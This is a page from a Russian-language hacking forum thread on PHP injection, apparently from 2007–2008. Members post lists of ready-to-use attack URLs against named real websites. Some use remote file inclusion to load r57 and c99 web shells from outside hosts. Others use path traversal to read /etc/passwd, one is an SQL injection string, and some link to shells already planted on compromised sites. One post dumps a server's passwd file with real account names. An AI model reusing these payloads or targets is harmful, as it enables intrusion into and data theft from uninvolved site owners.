PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. ax3l

    ax3l New Member

    Joined:
    26 Nov 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    ax

    http://www.e-daneshjoo.com/parts/lvlr-AlireZA.php
    http://www.avivabrasil.com.br/index.php?op=http://www.el-webstudio.de/img/shell.txt?
    http://www.coldstore-urk.nl/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://capaliyiz.biz/shell.txt?
    http://china.webd.pl/index.php?lang=http://evilc0der.com/fatal.txt?
    http://www.nzvikings.dk//pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://kelserific3.iespana.es/r57.txt??
    http://www.xavadam.com/index.php?p=http://evilc0der.com/erne.txt?
    http://www.cta-usa.org/index2.php?dest=http://www.r57.li/heykir.txt?
    http://www.mylxhq.com/bookmarks/index.php/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.evilc0der.com/fatal.txt?
    http://gradproekt.ru/index2.php?lang=http://kelserific3.iespana.es/r57.txt??
    http://www.dermatologico.org/pagina/index.php?pagina=http://www.gratisweb.com/p4ndr4x_X/pass.txt?
    http://www.alton.k12.nh.us/sharedcal//tools/send_reminders.php?noSet=0&includedir=http://rajakoya.freehostia.com/folder/c99.txt?
    http://saralta.org/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://evilc0der.com/fatal.txt?
    http://www.nchr.com.cn/aboutus/index.php?id=http://kelserific3.iespana.es/r57.txt?
    http://www.sinhan.net/zeroboard41//skin/zero_vote/error.php?dir=http://kelserific3.iespana.es/r57.txt??
    http://bid4alpacas.com/bid4alpacas/auction/phpAdsNew/view.inc.php?phpAds_path=http://kelserific3.iespana.es/r57.txt?
    http://www.azarchsoc.org/aascalendar/tools/send_reminders.php?noSet=0&includedir=http://kelserific3.iespana.es/r57.txt??
    http://test1.smumate.co.kr/bbs/include/write.php?dir=http://kelserific3.iespana.es/r57.txt??
    http://www.twisfer.org/index.php?pag=http://kelserific3.iespana.es/r57.txt??
    http://www.space21c.co.kr/bbs/skin/zero_vote/error.php?dir=http://kelserific3.iespana.es/r57.txt??
    http://www.stokvisdennen.nl/index.php?mosConfig_absolute_path=http://ataberk.tv/hacked/cold.txt?
    http://www.juegoarriba.com/dw/acardenas/catalog/j.php
    http://www.demircililer.org/index.php?page=http://capaliyiz.biz/shell.txt?
    http://www.weih.com.tw/appserv/main.php?appserv_root=http://kelserific3.iespana.es/r57.txt??
    http://dr-hiv.persiangig.com/shellz/backup.php
    http://attitude.nl/~manageme/dami.php
    http://www.anaguvenlik.com/safe.php
    http://www.purify-zombie.com//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://freewebs.com/senjataku/rina.txt?
    http://www.molnet.sk//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://freewebs.com/senjataku/rina.txt?
     
    1 person likes this.
  2. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    ой как же мне не стадно нашел инклуд прямо у земляка :)
    HTML:
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/passwd%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/hosts%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/ftpusers%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/syslog.conf%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/services%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/group%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/profile%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/bashrc%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/skel/.bashrc%00
    http://www.kinnet.ru/~locky/?p=../../../../../../../../../../etc/httpd/conf/httpd.conf%00
     
  3. 3.0.C

    3.0.C New Member

    Joined:
    8 Jan 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://iou.otstudio.com/download.php?upload_filename=../../../../../../../../etc/passwd
    TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
    Code:
    ### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
    ### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
    ### POC :
    ### /download.php?upload_filename=config_inc.php
    ### /download.php?upload_filename=../../../../../../../../etc/passwd
    ### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
    ### I'm TRYAGI  ;)  -- Tryag.cc/cc
    
    :)
     
  4. Cr@zy_King

    Cr@zy_King Member

    Joined:
    12 Sep 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    -5
    Linux :
    http://www.hotelbrno.cz/page.php?pageinc=http://by-enjoy.t35.com/atik/by.txt?

    Linux :
    http://www.rowanhilsden.com.au/remote.php

    Linux :
    http://www.waterless.com/product.php?product=http://by-enjoy.t35.com/atik/by.txt?

    Linux :
    http://www.all-free-fonts.com/?page=http://www.r57.li/r57.txt??

    Win(nt) :
    http://www.abruzzowebtv.it/index.php?content=http://drugs.kit.net/c99.txt?

    Freebsd :
    http://www.identification.net/customer/product.php?xcart_dir=http://source.ie/~collier/outdaed/shuntic?

    Linux :
    http://www.eloduna.hu/index.php?page=http://source.ie/~collier/outdaed/shuntic?

    Good. :)
     
    1 person likes this.
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.portcom.intercom.org.br/index.php?secao=http://

    инклуда нет, но весело)))
     
    1 person likes this.
  6. none222

    none222 Guest

    Reputations:
    0
    инклуд картинки с шеллом вконце. Сайт гитарисЦкий;)
     
  7. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Гг..
    ДРОЧИ.РУ - Каталог порно сайтов
    Code:
    http://www.drochi.ru/index.cgi?category=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  8. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    А как ты на него попал?
     
    2 people like this.
  9. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    257
    Reputations:
    46
    http://www.vde.net/cgi/rc/samples/dirfull.cgi/etc/passwd
     
    1 person likes this.
  10. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    НЕДВИЖИМОСТЬ.com.ua

    НЕДВИЖИМОСТЬ.com.ua

    http://www.nedvigimost.com.ua/news.php?num=../../../../../../etc/passwd%00&cat=odnews
     
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Решил сюда запостить

    http://www.cosmotech.info/index.php?page=-5+union+select+1,'/etc/passwd',3,4,version()
     
    5 people like this.
  12. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.drg.irp.com/cgi-bin/webplus.exe?Script=../../../etc/passwd

    http://www.irpsys.com/cgi-bin/webplus.exe?script=/../../../../etc/passwd
     
    1 person likes this.
  13. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Code:
    http://www.oksybox.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
    http://www.a-f-a24.de/cgi-bin/auktion.pl?t=../../../../../../../../../../../../../etc/passwd%00
    
    
     
    #613 ~!DoK_tOR!~, 2 Mar 2008
    Last edited: 2 Mar 2008
    1 person likes this.
  14. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    http://www.dbzhevan.net/main.php?id=../../../etc/passwd
    в исходнике
    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:12:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    ident:x:98:98::/home/ident:/sbin/nologin
    netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
    postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
    rob:x:501:501::/home/rob:/bin/bash
    matt:x:502:502::/home/matt:/bin/bash
    cody:x:503:503::/home/cody:/bin/bash
    dan:x:505:505::/home/dan:/bin/bash
    ben:x:506:506::/home/ben:/bin/bash
    rick:x:508:508::/home/rick:/bin/bash
    shawn:x:510:510::/home/shawn:/bin/bash
    alligosh:x:498:498::/home/alligosh:/bin/bash
    dhandy:x:497:497::/home/dhandy:/bin/bash
    spencer:x:496:496::/home/spencer:/bin/bash
    mike:x:489:489::/home/mike:/bin/bash
    sean:x:488:488::/home/sean:/bin/bash
    paul:x:485:499::/home/paul:/bin/bash
    robert:x:471:471::/home/robert:/bin/bash
    named:x:25:25:Named:/var/named:/sbin/nologin
    mysql:x:15:11:MySQL server:/var/lib/mysql:/bin/bash
    mailman:x:507:507::/usr/local/cpanel/3rdparty/mailman:/bin/bash
    cpanel:x:509:509::/usr/local/cpanel:/bin/bash
    americb0:x:513:514::/home/americb0:/bin/noshell
    laptopen:x:514:515::/home/laptopen:/bin/noshell
    jarosikc:x:517:518::/home/jarosikc:/bin/noshell
    shoppin1:x:518:519::/home/shoppin1:/bin/noshell
    teammohc:x:519:520::/home/teammohc:/bin/noshell
    specialt:x:520:521::/home/specialt:/bin/noshell
    jamessha:x:522:523::/home/jamessha:/bin/noshell
    infoisus:x:525:526::/home/infoisus:/bin/noshell
    highbarc:x:527:528::/home/highbarc:/bin/noshell
    solmannc:x:529:530::/home/solmannc:/bin/noshell
    baytechw:x:530:531::/home/baytechw:/bin/noshell
    sukawati:x:533:534::/home/sukawati:/bin/noshell
    securebu:x:534:535::/home/securebu:/bin/noshell
    lyonsfal:x:535:536::/home/lyonsfal:/bin/noshell
    postjobs:x:537:538::/home/postjobs:/bin/bash
    stspporg:x:538:539::/home/stspporg:/bin/noshell
    apicalsc:x:539:540::/home/apicalsc:/bin/noshell
    hydaddsc:x:540:541::/home/hydaddsc:/bin/noshell
    trustyne:x:541:542::/home/trustyne:/bin/noshell
    akindwor:x:542:543::/home/akindwor:/bin/noshell
    fairelea:x:543:544::/home/fairelea:/bin/noshell
    deafspar:x:544:545::/home/deafspar:/bin/noshell
    epgroupf:x:545:546::/home/epgroupf:/bin/noshell
    и так далее
     
  15. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Итак, Вот что я сегодня накопал
    http://www.cyprus-directory.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://duitsland-vakantieland.nl/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://www.earrs.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/

    http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://www.goqueer.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://incrediblebears.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd

    http://www.louisvillenews.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://macondo.virtualave.net/cgi-bin/general/tseekdir.cgi?location=/etc/passwd%00

    http://www.markenshop-portal.de/cgi-bin/tseekdir.cgi?location=/etc/passwd%00


    в гугле проверял, вроде таких же язв нету
    Античату респект
     
    #615 neon_fx, 3 Mar 2008
    Last edited: 3 Mar 2008
  16. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    http://www.officesystems.ru/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
    http://www.exyucaffe.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
    http://www.liceoleonardogiarre.it/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
    http://www.zavisni.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd
     
  17. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Linuxcrow.unixbsd.info2.6.9-55.0.12.ELsmp#1 SMP Fri Nov 2 11:19:08 EDT 2007i686

    =)
     
  18. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://vnkatonak.com/autohtml.php?filename=../../../../../../etc/passwd

    http://www.ke-f.org/autohtml.php?filename=../../../../../../etc/passwd


    Порносайтец
    http://gallery.mastervcd.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

    http://www.fund-africa.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://www.wesways.net/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://cybertaka.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://www.createbusiness.biz/paypal/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://iprobill.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://pagoquick.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://worldpayme.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    Банк какойто
    http://globalbizbank.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://www.bitzone.co.uk/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://scenepay.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://www.payrupees.com/index.php?read=../../../../../../../../../../../../../etc/passwd

    http://www.extreme-pay.com/index.php?read=../../../../../../../../../../../../../etc/passwd
     
    #618 neon_fx, 5 Mar 2008
    Last edited: 6 Mar 2008
    1 person likes this.
  19. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    we.mtu.edu
    __http://www.we.mtu.edu/faq.php?which=../../../../../../etc/passwd%00

     
  20. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Можно и без самих логов ИМХО
    если каждый лог вылаживать то в топике такой бардак будет

    тем более он не несет кокой то интересной инфы
    ну это только мое мнение

    //******************************************

    Всем привет
    ище одна бессонная ночь закончилать вроде бы хорошим результатом

    Ну по крайней мере баян не наблюдается
    И деньги на инет заканчиваются :)))
    Античат респект

    ааааа
    и еще одно :
     
    #620 neon_fx, 6 Mar 2008
    Last edited: 7 Mar 2008
    1 person likes this.